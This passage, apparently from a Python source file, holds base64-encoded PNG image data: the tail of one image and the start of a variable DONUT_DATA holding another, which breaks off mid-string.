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'
DONUT_DATA = b'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